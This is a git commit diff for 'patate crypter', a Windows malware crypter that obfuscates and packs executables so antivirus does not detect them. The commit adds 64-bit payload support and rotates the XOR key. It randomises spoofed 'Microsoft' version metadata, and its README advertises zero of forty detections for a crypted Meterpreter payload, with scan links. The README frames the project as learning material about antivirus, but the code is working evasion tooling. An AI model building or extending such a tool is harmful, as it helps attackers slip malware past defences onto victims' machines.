add: x64 bit support, automatic detection of architecture, 0/40 detects in x64 bit

2024-03-19 10:29:40 +01:00
parent 4d6b376c03
commit 4c45ea8422
8 changed files with 45 additions and 25 deletions
--- a/Builder/gui.py
+++ b/Builder/gui.py
@@ -37,6 +37,7 @@ from PyQt5.QtGui import QPixmap
 from obfuscation import obfuscate
 from metadata import change_metadata
 import os, shutil, glob
+import pefile

 class Ui_mainWindow(object):
    def __init__(self) :
@@ -141,6 +142,7 @@ class Ui_mainWindow(object):
        self.checkBox_3.setText(_translate("mainWindow", "Control flow"))
    
    def generate(self) :
+        is_64bit = False
        in_filename = self.filepath
        out_filename = "../bin/" + self.pushButton.text().split(".")[0] + "_out.exe"
        xor_key = ''
@@ -155,6 +157,19 @@ class Ui_mainWindow(object):
            QCoreApplication.processEvents()
            return
    
+        try :
+            pe = pefile.PE(in_filename)
+        except :
+            self.label_2.setText("File is not a binary.")
+            QCoreApplication.processEvents()
+            return
+        if hex(pe.FILE_HEADER.Machine) == '0x14c':
+            self.label_2.setText("File is a 32-bit binary")
+        else:
+            self.label_2.setText("File is a 64-bit binary")
+            is_64bit = True
+        QCoreApplication.processEvents()
+
        self.label_2.setText("Creating sample header...")
        QCoreApplication.processEvents()
        
@@ -184,7 +199,7 @@ class Ui_mainWindow(object):
        
        self.label_2.setText("Adding junk code...")
        QCoreApplication.processEvents()
-        obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk)
+        obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk, is_64bit)
        self.label_2.setText("done.")
        QCoreApplication.processEvents()
        
@@ -201,7 +216,11 @@ class Ui_mainWindow(object):
        vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe
        cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe"
        
-        return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+"  /t:Rebuild")
+        if is_64bit :
+            return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x64;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+"  /t:Rebuild")
+        else :
+            return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+"  /t:Rebuild")
+
        
        if return_code :
            self.label_2.setText("build failed.")
--- a/Builder/obfuscation.py
+++ b/Builder/obfuscation.py
@@ -149,7 +149,7 @@ def GetRandomControlFlow():
    return cpp_code

 FILES_TO_OBFUSCATE = {"../Crypter/main.cpp":"../Crypter/DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"}
-def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
+def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
    if PASS < CFLOW_PASS : PASS = CFLOW_PASS
    
    if not cflow and not junk : PASS = 0
@@ -237,7 +237,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
                if GetRandomBool() and in_func : # do we call a function ?
                    out.append(CallRandomFunction()+"\n")
                
-                if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ?
+                if GetRandomBool() and in_func and cflow and k < CFLOW_PASS and not is64bit : # do we mess up control flow ?
                    out.append(GetRandomAssemblyBlock()+"\n")
                
                if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ?
--- a/Builder/requirements.txt
+++ b/Builder/requirements.txt
@@ -1,2 +1,3 @@
 pillow
-pywin32
+pywin32
+pefile
--- a/Crypter/config.h
+++ b/Crypter/config.h
@@ -1,2 +1,2 @@
 #pragma once
-#define KEY "mkhjqsdhfjbzqfcqzf"
+#define KEY "pqihzifvqzidbzq"
--- a/Crypter/patate-crypter.rc
+++ b/Crypter/patate-crypter.rc
@@ -68,12 +68,12 @@ BEGIN
        BLOCK "040c04b0"
        BEGIN
 			VALUE "CompanyName", "Microsoft"
-			VALUE "FileDescription", "clgdknugqsthezarlwbq"
+			VALUE "FileDescription", "mwqaxnynrtvjaafmtwew"
 			VALUE "FileVersion", "1.0.0.1"
-			VALUE "InternalName", "yhoqres.exe"
+			VALUE "InternalName", "hoflypx.exe"
 			VALUE "LegalCopyright", "Copyright (C) 2023"
-			VALUE "OriginalFilename", "erbggay.exe"
-			VALUE "ProductName", "awwmoqx.exe"
+			VALUE "OriginalFilename", "ckhvspq.exe"
+			VALUE "ProductName", "rrrxbyl.exe"
            VALUE "ProductVersion", "1.0.0.1"
        END
    END
--- a/Crypter/patate-crypter.vcxproj
+++ b/Crypter/patate-crypter.vcxproj
@@ -49,7 +49,7 @@
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
    <CharacterSet>MultiByte</CharacterSet>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
@@ -138,6 +138,7 @@
      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
      <LanguageStandard>stdcpp17</LanguageStandard>
+      <OmitFramePointers>false</OmitFramePointers>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
@@ -148,20 +149,24 @@
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
      <LanguageStandard>stdcpp17</LanguageStandard>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <Optimization>Disabled</Optimization>
+      <OmitFramePointers>false</OmitFramePointers>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
    </ClCompile>
    <Link>
-      <SubSystem>Console</SubSystem>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>false</EnableCOMDATFolding>
+      <OptimizeReferences>false</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
      <AdditionalOptions>/NXCOMPAT:no %(AdditionalOptions)</AdditionalOptions>
+      <GenerateWindowsMetadata>false</GenerateWindowsMetadata>
    </Link>
  </ItemDefinitionGroup>
  <ItemGroup>
--- a/Crypter/patate-crypter.vcxproj.filters
+++ b/Crypter/patate-crypter.vcxproj.filters
@@ -18,9 +18,6 @@
    <ClCompile Include="main.cpp">
      <Filter>Fichiers sources</Filter>
    </ClCompile>
-    <ClCompile Include="anti_emu.cpp">
-      <Filter>Fichiers sources</Filter>
-    </ClCompile>
  </ItemGroup>
  <ItemGroup>
    <ClInclude Include="config.h">
@@ -32,9 +29,6 @@
    <ClInclude Include="sample.h">
      <Filter>Fichiers d%27en-tête</Filter>
    </ClInclude>
-    <ClInclude Include="anti_emu.h">
-      <Filter>Fichiers d%27en-tête</Filter>
-    </ClInclude>
  </ItemGroup>
  <ItemGroup>
    <ResourceCompile Include="patate-crypter.rc">
--- a/README.md
+++ b/README.md
@@ -4,14 +4,15 @@ The project structure is **very** messy because i wasn't planning on releasing i
 I will not provide any support for running the program, it is only made for people interested in cyber security to learn more about how AV work.

 # Limitations
-patate crypter officially supports 32bit DLLs and PEs. It might be possible to add x64 bit support without too much issues, but i never tried, maybe one day.<br>
+patate crypter officially supports 32bit and 64bit DLLs and PEs.<br>
 There is an issue where the reallocations would fail for specific payloads, TOFIX.<br>
 There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)).

 # Detection rate
 There is currently 0/40 detections for a crypted meterperter :
 - [original meterpreter](https://www.kleenscan.com/scan_result/6ea55d54a947393082f524215c28185ef90a7ec9cb9c50f25c555715b61b0e3e)
- [crypted](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54)
+- [crypted 32 bit](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54)
+- [crypted 64 bit](https://www.kleenscan.com/scan_result/9c0ae91e19425ff4c2d8120f1cb787f0480c7780faa6e1e57517b2aea831e272)

 # How does it work ?
 The crypter (compile time) works by :